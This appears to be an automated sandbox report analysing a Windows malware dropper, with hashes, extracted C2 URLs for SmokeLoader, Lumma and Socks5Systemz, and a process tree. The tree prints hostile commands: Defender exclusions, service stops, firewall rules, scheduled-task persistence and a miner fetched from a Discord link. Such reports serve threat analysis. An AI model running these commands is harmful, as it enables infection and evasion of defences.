Resubmissions

22-08-2024 15:33

240822-sy6bqsvbng 7

10-03-2024 16:21

240310-ttpc4aga89 10

10-03-2024 12:34

240310-prvpwacf93 10

Analysis

  • max time kernel
    453s
  • max time network
    681s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10-03-2024 16:21

General

  • Target

    file.exe

  • Size

    2.4MB

  • MD5

    b11c3fad2e48022f58635df7368d6441

  • SHA1

    63883fee892ac1e0d44f568913931c0d59b343d1

  • SHA256

    2a362d6d3bceaf1159bc245499a778f1ab9c229c3cbd4be4c63a582a716a4c80

  • SHA512

    6c68523b259c307e1c4ff4c6809fb20e5d9d9998a32d03ca06eaf29ec8f27bcaca2cafd9b57420b307160b3ebfeac16d234b99f6119f8f3038f4b5bf4b169023

  • SSDEEP

    49152:jCqqfqaaK++EFUw2PsQMIZnLzn8FGaqxMBeVBBzKl:jONGXqGY1y

Malware Config

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

smokeloader

Version

2022

C2

http://trad-einmyus.com/index.php

http://tradein-myus.com/index.php

http://trade-inmyus.com/index.php

rc4.i32
rc4.i32

Extracted

Family

lumma

C2

https://wisemassiveharmonious.shop/api

https://colorfulequalugliess.shop/api

https://relevantvoicelesskw.shop/api

https://associationokeo.shop/api

https://resergvearyinitiani.shop/api

Extracted

Family

socks5systemz

C2

http://aiueiup.ru/search/?q=67e28dd83a5da32a155afd1b7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978a271ea771795af8e05c644db22f31dfe339426fa11af66c152adb719a9577e55b8603e983a608fff11c8e7949f3d

http://aibukfn.ru/search/?q=67e28dd83a5da32a155afd1b7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978a271ea771795af8e05c644db22f31dfe339426fa11af66c152adb719a9577e55b8603e983a608fff11c8e7949f3d

Signatures

  • DcRat 14 IoCs

    DarkCrystal (DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 3 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socks5Systemz

    Socks5Systemz is a botnet written in C++.

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 14 IoCs
  • Executes dropped EXE 48 IoCs
  • Loads dropped DLL 21 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 21 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Unexpected DNS network traffic destination 2 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 6 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMonFS driver. 1 IoCs

    Rootkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 27 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • NSIS installer 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 44 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2904
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
      2⤵
        PID:5084
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
        2⤵
          PID:1600
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /4
        1⤵
        • DcRat
        • Loads dropped DLL
        • Checks SCSI registry key(s)
        • Checks processor information in registry
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:2428
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4120 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:456
        • C:\Windows\System32\rundll32.exe
          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          1⤵
            PID:5300
          • C:\Users\Admin\AppData\Local\Temp\file.exe
            "C:\Users\Admin\AppData\Local\Temp\file.exe"
            1⤵
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:5652
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
              2⤵
              • DcRat
              • Drops startup file
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:5724
              • C:\Users\Admin\Pictures\jVcQfTbmL2u1ousPu7tmRClP.exe
                "C:\Users\Admin\Pictures\jVcQfTbmL2u1ousPu7tmRClP.exe"
                3⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:6140
                • C:\Users\Admin\AppData\Local\Temp\is-3Q3V6.tmp\jVcQfTbmL2u1ousPu7tmRClP.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-3Q3V6.tmp\jVcQfTbmL2u1ousPu7tmRClP.tmp" /SL5="$203F8,1697450,56832,C:\Users\Admin\Pictures\jVcQfTbmL2u1ousPu7tmRClP.exe"
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1052
                  • C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
                    "C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -i
                    5⤵
                    • Executes dropped EXE
                    PID:5480
                  • C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
                    "C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -s
                    5⤵
                    • Executes dropped EXE
                    PID:1592
              • C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe
                "C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe"
                3⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:5132
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  4⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5148
                • C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe
                  "C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe"
                  4⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Checks for VirtualBox DLLs, possible anti-VM trick
                  • Drops file in Windows directory
                  • Modifies data under HKEY_USERS
                  PID:1756
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    5⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5300
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                    5⤵
                      PID:2136
                      • C:\Windows\system32\netsh.exe
                        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                        6⤵
                        • Modifies Windows Firewall
                        PID:1108
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      5⤵
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:2592
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      5⤵
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:3328
                    • C:\Windows\rss\csrss.exe
                      C:\Windows\rss\csrss.exe
                      5⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Manipulates WinMonFS driver.
                      • Drops file in Windows directory
                      PID:5536
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        6⤵
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        PID:6076
                      • C:\Windows\SYSTEM32\schtasks.exe
                        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                        6⤵
                        • DcRat
                        • Creates scheduled task(s)
                        PID:4508
                      • C:\Windows\SYSTEM32\schtasks.exe
                        schtasks /delete /tn ScheduledUpdate /f
                        6⤵
                          PID:2136
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          6⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          PID:5468
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          6⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          PID:2892
                        • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                          C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                          6⤵
                          • Executes dropped EXE
                          PID:5904
                        • C:\Windows\SYSTEM32\schtasks.exe
                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                          6⤵
                          • DcRat
                          • Creates scheduled task(s)
                          PID:1892
                        • C:\Windows\windefender.exe
                          "C:\Windows\windefender.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:5388
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                            7⤵
                              PID:6124
                              • C:\Windows\SysWOW64\sc.exe
                                sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                8⤵
                                • Launches sc.exe
                                PID:1864
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            6⤵
                              PID:2444
                            • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
                              C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
                              6⤵
                                PID:5432
                                • C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
                                  C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --tls --nicehash -o showlock.net:443 --rig-id f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --tls --nicehash -o showlock.net:80 --rig-id f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --nicehash --http-port 3433 --http-access-token f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --randomx-wrmsr=-1
                                  7⤵
                                    PID:1820
                                  • C:\Windows\rss\csrss.exe
                                    C:\Windows\rss\csrss.exe -hide 1820
                                    7⤵
                                      PID:1192
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        8⤵
                                          PID:5240
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      6⤵
                                        PID:1840
                                      • C:\Windows\SYSTEM32\schtasks.exe
                                        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                        6⤵
                                        • DcRat
                                        • Creates scheduled task(s)
                                        PID:336
                                      • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                                        C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                                        6⤵
                                          PID:5356
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -nologo -noprofile
                                          6⤵
                                            PID:5032
                                          • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                                            C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                                            6⤵
                                              PID:2740
                                      • C:\Users\Admin\Pictures\vn0dZ1KknFaoEqIsGOGNDVH5.exe
                                        "C:\Users\Admin\Pictures\vn0dZ1KknFaoEqIsGOGNDVH5.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Checks SCSI registry key(s)
                                        • Suspicious behavior: MapViewOfSection
                                        PID:5168
                                      • C:\Users\Admin\Pictures\6VC6yCs5XvpI0RU46xUTlGFH.exe
                                        "C:\Users\Admin\Pictures\6VC6yCs5XvpI0RU46xUTlGFH.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of WriteProcessMemory
                                        PID:392
                                        • C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                                          C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                                          4⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Checks processor information in registry
                                          PID:5388
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 3320
                                            5⤵
                                            • Program crash
                                            PID:5220
                                        • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                                          C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                                          4⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetWindowsHookEx
                                          • Suspicious use of WriteProcessMemory
                                          PID:4752
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                                            5⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:1660
                                            • C:\Windows\SysWOW64\chcp.com
                                              chcp 1251
                                              6⤵
                                                PID:3720
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                                                6⤵
                                                • DcRat
                                                • Creates scheduled task(s)
                                                PID:3148
                                        • C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe
                                          "C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe" --silent --allusers=0
                                          3⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Enumerates connected drives
                                          • Modifies system certificate store
                                          • Suspicious use of WriteProcessMemory
                                          PID:5344
                                          • C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe
                                            C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x2fc,0x300,0x304,0x2d8,0x308,0x6e7f21c8,0x6e7f21d4,0x6e7f21e0
                                            4⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:512
                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\tJ6HSphWPkDhrW4fuBx7FKRM.exe
                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\tJ6HSphWPkDhrW4fuBx7FKRM.exe" --version
                                            4⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:1752
                                          • C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe
                                            "C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5344 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240310162828" --session-guid=212f66a5-7f1b-448e-b906-6cdefc4c9881 --server-tracking-blob=MjUwNDNlOGVhNjM1NmY4OTkyNzdjZTEwNGEwODhmZGRjODEwMDM2ODY5YjI5ZmU1OGFkZTRiZjVhNTE5MTI0NDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMDA4ODA5MC44NTUyIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIyNWVhMmQwNS1kODE4LTRkZmEtYmQ0MC0yZjVlNjkyYmI4ZGYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=A405000000000000
                                            4⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Enumerates connected drives
                                            PID:912
                                            • C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe
                                              C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x308,0x30c,0x310,0x2d8,0x314,0x6dce21c8,0x6dce21d4,0x6dce21e0
                                              5⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:3720
                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            PID:4332
                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe" --version
                                            4⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:5208
                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
                                              "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x288,0x28c,0x290,0x260,0x294,0x1000040,0x100004c,0x1000058
                                              5⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:5048
                                        • C:\Users\Admin\Pictures\eNjkg8FaEHV29ts9FvoPTUAW.exe
                                          "C:\Users\Admin\Pictures\eNjkg8FaEHV29ts9FvoPTUAW.exe"
                                          3⤵
                                          • Drops file in Drivers directory
                                          • Executes dropped EXE
      • Drops file in System32 directory
      PID:5576
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        4⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1892
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        4⤵
        PID:5156
        • C:\Windows\system32\wusa.exe
          wusa /uninstall /kb:890830 /quiet /norestart
          5⤵
          PID:3712
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop UsoSvc
        4⤵
        • Launches sc.exe
        PID:2248
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        4⤵
        • Launches sc.exe
        PID:1604
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop wuauserv
        4⤵
        • Launches sc.exe
        PID:2596
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop bits
        4⤵
        • Launches sc.exe
        PID:6124
        • C:\Windows\System32\Conhost.exe
          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          5⤵
          PID:5480
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop dosvc
        4⤵
        • Launches sc.exe
        PID:3268
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        4⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4564
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        4⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2140
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        4⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2364
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        4⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5140
        • C:\Windows\System32\Conhost.exe
          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          5⤵
          PID:1752
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
        4⤵
        • Launches sc.exe
        PID:456
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
        4⤵
        • Launches sc.exe
        PID:4120
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop eventlog
        4⤵
        • Launches sc.exe
        PID:5648
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
        4⤵
        • Launches sc.exe
        PID:4084
    • C:\Users\Admin\Pictures\zauJwzNDKtlWh0Su7sA66DV7.exe
      "C:\Users\Admin\Pictures\zauJwzNDKtlWh0Su7sA66DV7.exe"
      3⤵
      • Executes dropped EXE
      PID:2612
      • C:\Users\Admin\AppData\Local\Temp\is-5M28V.tmp\zauJwzNDKtlWh0Su7sA66DV7.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-5M28V.tmp\zauJwzNDKtlWh0Su7sA66DV7.tmp" /SL5="$1403A2,1697450,56832,C:\Users\Admin\Pictures\zauJwzNDKtlWh0Su7sA66DV7.exe"
        4⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:4464
        • C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
          "C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -i
          5⤵
          • Executes dropped EXE
          PID:4764
        • C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
          "C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -s
          5⤵
          • Executes dropped EXE
          PID:2516
    • C:\Users\Admin\Pictures\p1ZjVvAKBV5XkBUaTd0q2FDb.exe
      "C:\Users\Admin\Pictures\p1ZjVvAKBV5XkBUaTd0q2FDb.exe"
      3⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:1588
      • C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
        C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
        4⤵
        • Executes dropped EXE
        PID:2064
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2064 -s 1020
          5⤵
          • Program crash
          PID:5232
      • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
        C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
        4⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:5488
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
          5⤵
          PID:5992
          • C:\Windows\SysWOW64\chcp.com
            chcp 1251
            6⤵
            PID:3560
          • C:\Windows\SysWOW64\schtasks.exe
